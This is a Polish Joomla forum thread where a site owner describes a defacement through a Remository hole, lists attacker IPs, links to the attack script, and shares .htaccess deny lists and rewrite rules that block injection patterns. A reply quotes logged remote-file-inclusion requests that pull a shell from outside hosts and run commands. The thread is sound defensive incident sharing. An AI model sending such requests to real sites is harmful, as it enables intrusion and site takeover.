We have been hacked! - Niewinnie ale zawsze - Info
Wyniki 1 do 10 z 14

Temat: We have been hacked! - Niewinnie ale zawsze - Info

Hybrid View

Poprzednia wiadomość Poprzednia wiadomość   Następna wiadomość Następna wiadomość
  1. #1
    Przeglądacz
    Dołączył
    28-01-2006
    Skąd
    southampton, U.K.
    Wpisy
    35
    Punkty
    10

    Domyślny We have been hacked! - Niewinnie ale zawsze - Info

    witam
    jak w tytule. dobrali mi sie do serwisu. zostawie info to moze innym sie przyda zeby sobie dziury polatac.


    OPIS
    kilka dni temu, wieczorem, pracowalem nad serwisem. przy okazji odswiezenia strony w pewnej chwili pokazalo mi sie cos dziwnego. kilka linijek tekstu. bezwiednie to zignorowalem nawet nie czytajac co tam napisane. kolejne odswiezenie i dokladnie to sam. co jest? wklepanie z palca adresu podstrony - to samo... dopiero po kilku sekundach zrozumialem co jest grane.


    SKUTKI
    nasz serwis http://southampton.info.pl zostal zaatakowany. jak sie okazalo niewinnie i 'ofiar w ludziach' nie bylo ale sam fakt dawal do myslenia. padlismy ofiara ataku typu H czyli 'homepage defacement' (podmiana strony glownej). wykorzystano fakt braku deklaracji w pliku .htaccess domyslnego rozszerzenia pliku 'index'. na serwer wyslany zostal plik index.htm ktory w tym przypadku wzial gore nad joomlowym index.php (przy braku wspomnianej deklaracji pliki index.html lub index.htm sa traktowane przez serwer Apache jako domyslne i wyswietlane 'przed' plikami index.php).

    kopie podmienionej strony glownej zobaczycie tutaj:
    http://southampton.info.pl/_index_ha...dex-hacked.htm

    zainteresowani struktura pliku (zrodlem) zamiast 'podgladac' mog pobrac spakowany plik tutaj:
    http://southampton.info.pl/_index_ha...dex-hacked.zip

    po za podmiana strony glownej (ktora zreszta wyswietlala sie rowniez na wszystkich adresach podstron i to wpisanych 'z palca' (ciekawe...) nie ponieslismy innych strat. nie skasowano lub podmieniono innych plikow. poniewaz 'bylem na stronie' w chwili ataku, nie trfal on dlugo. moze 5 minut. po tym czasie przywrocilem normalna funkcjonalnosc serwisu. jednak juz to 5 minut wystarczylo aby atak zostal zaliczony i odnotowany w statystykach grupy ktora nas zaatakowala.
    nazywaja sie PadiSim Hack Team .
    wlam do nas jest odnotowany w ich statystykach tutaj:
    http://www.zone-h.org/index2.php?opt...=43&id=4590309


    SLEDZTWO....
    ....wykazalo ze hasla do ftp nie zostaly ruszone. uwazne wertowanie logow przynioslo skutki i oto co te fajfusy zostawily po sobie:
    http://southampton.info.pl/_index_ha...bsite_hack.log

    atak trwal od 22:59:07 do 23:04:58.
    o 23:02:14 odwiedzil nas skrypt z http://www.zone-h.org ktory zaliczyl fajfusom wlam.

    adresy IP zamieszane w hack:
    85.102.201.9 - TurkTelekom / turcja (WHOIS TUTAJ)
    - pod tym adresem siedzial fajfus bezposrednio atakujacy strone
    - adres jest juz notowany w bazie spam i abuse (czerowne pola w tabeli)
    http://www.dnsstuff.com/tools/ip4r.ch?ip=85.102.201.9


    85.103.232.27 - TurkTelekom / turcja (WHOIS TUTAJ)
    - ktos z tego adresu wszedl na strone glowna
    - adres jest juz notowany w bazie spam i abuse (czerwone pola w tabeli)
    http://www.dnsstuff.com/tools/ip4r.ch?ip=85.103.232.27

    62.150.154.23 - kuwait (WHOISE TUTAJ)
    - z tego IP zostal wyslany adres mojej strony do
    http://www.zone-h.org/component/opti...cks/Itemid,45/ w celu zaliczenia wlamu przez skrypt statystyk
    - adres jest juz notowany w bazie spam i abuse (czerwone pola w tabeli)
    http://www.dnsstuff.com/tools/ip4r.ch?ip=62.150.154.23

    atakujacy wykorzystal skrypt zapisany do pliku tekstowego o nazwie 2Fc99.txt. plik ze skryptem jest (a raczej na chwile obecna byl) umieszczony pod adresem http://2fmectruy.by.ru. adres IP tego serwera to 217.16.29.51 - rosja (WHOIS TUTAJ). serwer oczywiscie notowany w bazie spam i abuse (czerwone pola w tabeli) http://www.dnsstuff.com/tools/ip4r.ch?ip=217.16.29.51

    osoby zainteresowane kodem zrodlowym skryptu ktory podmienil strone glowna (a raczej zostal wykorzystany do jej podmiany) moga go pobrac tutaj:
    http://southampton.info.pl/_index_ha...sitory3.25.zip
    zamieszczam go bo moze pomoc to koderom w lepszym poznaniu metod wlamu i pisaniu szczelniejszego kodu.

    UWAGA: w pliku .zip znajduje sie spakowany dokument Worda z kodem zrodlowym skryptu. w TAKIEJ POSTACI skrypt NIE JEST AKTYWNY i jest calkowicie BEZPIECZNY! prosze jednak NIE ZAPISYWAC tego dokumenty jako pliku tekstowego .txt. czynnosc taka AKTYWUJE kod i tworzy z pliku czynny plik trojana. zostaliscie ostrzezeni. bawicie sie tym plikiem na wlasna odpowiedzialnosc!

    skrypt ten jest znany. wykorzystuje luke bezpieczenstwa w Remository 3.25. na forum projektu Remository znajdziecie wiecej informacji:
    http://www.remository.com/component/.../id,3657/#3657


    PREWENCJA
    wykorzystano luke w Remository 3.25. tak wiec update do nowej wersji Remository to pierwszy krok obrony.

    jak widac hasla nie zostaly ruszone. zmienilem jednak i wzmocnilem sile wszystkich hasel na stronie, do ftp, panelu administracji kontem u ISP oraz panelu admina joomli. dodatkowo dostep do katalogu z logowaniem admina joomli zostal uszczelniony po przez ochrone http_auth czyli ochrone dostepu do katalogu po przez haslo. wiecej info tutaj:
    http://php.benscom.com/manual/pl/features.http-auth.php

    w pliku .htaccess zostaly dopisane:

    Kod:
    #ustalenie 'kolejki waznosci' wyswietlania domyslnego pliku 
    #index w zaleznosci od rozszerzenia
    DirectoryIndex index.php index.html index.htm
    Kod:
    ########## Begin - Blokowanie dostepu z adresow IP
    #  
    <Files  403.shtml>
    order  allow,deny
    allow from all
    </Files>
     
    #  zone h - serwer zliczajacy statystyki wlaman
    deny from  .zone-h.org
    deny from  .zone-h.com 
    deny from  213.219.122
    deny from 62.150.154.23
     
    # cyber-warrior.org - serwer zliczajacy statystyki wlaman
    deny from  .cyber-warrior.org
    deny from  .cyber-security.org
    deny from   80.237.211.8 
    
    #blokowanie dostepu z adresow IP
    deny from 85.102.201.9    
    deny from 85.103.232.27   
    deny from 62.150.154.23   
    deny from 217.16.29.51   
    #
    dodatkowo w tym samym pliku .htaccess dodalem:

    Kod:
    ########## poczatek - Rewrite rules - blokowanie niektorych 
    #znanych exploitow
    #                             
    # Block out any script trying to set a mosConfig value through the URL
    RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
    # Block out any script trying to base64_encode crap to send via URL
    RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
    # Block out any script that includes a <script> tag in URL
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    # Block out any script trying to set a PHP GLOBALS variable via URL
    RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    # Block out any script trying to modify a _REQUEST variable via URL
    RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
    # Send all blocked request to homepage with 403 Forbidden error!
    RewriteRule ^(.*)$ index.php [F,L]
    #
    ########## koniec
    polecam wszystkim uszczelnienie systemu i dodanie tych fragmentow do pliku .htaccess (uwaga: trzeci kod 'rewrite rules' nie dziala z plikami htaccess.txt).


    PODSUMOWANIE
    "....myjcie sie dziewczyny bo nie znacie dnia ani godziny...."
    czyli badzcie czujni i nie zapominajcie ze kazdy z nas moze zostac obiektem ataku. aktualizacje komponentow i systemu rzecz swieta!

    mam nadzieje ze moje wypociny pomoga innym w utrzymaniu ich serwisow 'on-line' hehe.

    pozdro i THE END
    Ostanio edytowane przez piotr.uk : 24-08-2006 20:13

  2. #2
    Przeglądacz
    Dołączył
    31-05-2006
    Wpisy
    44
    Punkty
    12

    Domyślny

    u mnie włamali się (dokładnie ta sama grupa) przez komponent PeopleBook. W logach odnotowałem coś takiego
    Kod PHP:
    /com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://parit.org/0000-CMDS/cse.gif?&cmd=id 
    a wejscie było z takiego IP: 200.189.60.253

    oraz coś takiego
    Kod PHP:
    /com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fileupyours.com/files/27375/input?&cmd 
    IP 202.95.135.234
    :cool: pozdrowionka

  3. #3
    Debiutant
    Dołączył
    17-03-2007
    Wpisy
    2
    Punkty
    10

    Domyślny

    Podnosze, bo sam dzisiaj zostalem ofiara metody na mosConfig ;(

    Tym razem przez multithumb - folder greybox i jeden z tamtejszych plikow. Skasowalem ten folder (korzystam z innej metody wysw. zdjec) oraz dodalem podane wyzej linijki. Szkoda, ze dopiero teraz trafilem na ten temat ;|

  4. #4
    Debiutant
    Dołączył
    25-01-2008
    Wpisy
    6
    Punkty
    10

    Domyślny

    witam
    mi również shackowano stronę, tylko że nie wiem, jak sprawdzić, kto to był, i jak się włamano. proszę o jakąś pomoc.
    stronka: http://ulksgrabowka.ovh.org

  5. #5
    Wiarus
    Dołączył
    20-11-2007
    Wpisy
    2 924
    Punkty
    51

    Domyślny

    Cytat Wysłane przez kkafara Zobacz wiadomość
    witam
    mi również shackowano stronę, tylko że nie wiem, jak sprawdzić, kto to był, i jak się włamano. proszę o jakąś pomoc.
    stronka: http://ulksgrabowka.ovh.org
    Czy Wasza strona była oparta o CMS Joomla? Jeśli tak to co to była za wersja i jakie komponenty mieliście zainstalowane.
    Co do samego sprawdzenia kto to był i jak dokonał włamu głównie wystarczy przeglądnąć logi z serwera i wyciągnąć z nich odpowiednich wniosków. Z kontami płatnymi nie ma problemu (standardowa usługa) z bezpłatnymi jest inaczej niemniej jednak proponuję kontakt z administratorami ovh i poinformowaniem ich o tej sprawie. Czy odpowiedzą i czy podejmą jakieś kroki - niestety nie mam żadnych doświadczeń w tej sprawie gdyż nie korzystałem nigdy z ich usług.

  6. #6
    Debiutant
    Dołączył
    25-01-2008
    Wpisy
    6
    Punkty
    10

    Domyślny

    strona była oparta o Joomle w wersji 1.0.13 Stable
    joomle instalowałem automatycznie przez serwer ovh
    po wejściu na stronę było tylko coś takiego:
    H4CKED BY X MAN
    moje komponenty, moduły i boty:
    http://www.vpx.pl/up/20080226/117024...339b187084.jpg
    http://www.vpx.pl/up/20080226/117026...cbf8188791.jpg
    http://www.vpx.pl/up/20080226/117027...c4e5121744.jpg

    - większość to standardowe, instalowane przez serwer.

  7. #7
    Wiarus
    Dołączył
    20-11-2007
    Wpisy
    2 924
    Punkty
    51

    Domyślny

    Cytat Wysłane przez kkafara Zobacz wiadomość
    strona była oparta o Joomle w wersji 1.0.13 Stable
    joomle instalowałem automatycznie przez serwer ovh
    Proponuje kontakt z administratorami ovh i opisanie całej sytuacji oraz prośbę o analize logów serwera i ewentualne wskazanie drogi ataku. To moze wskazać odpowiedź co byłą tą dziurą przez którą dostali się qrackerzy. Jeśli uzyskasz jakieś informacje to opublikuj je tutaj na forum.

    Z dodatków miałeś tylko mXcomment reszta patrząc na screeny to standardowe elementy Joomla.

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •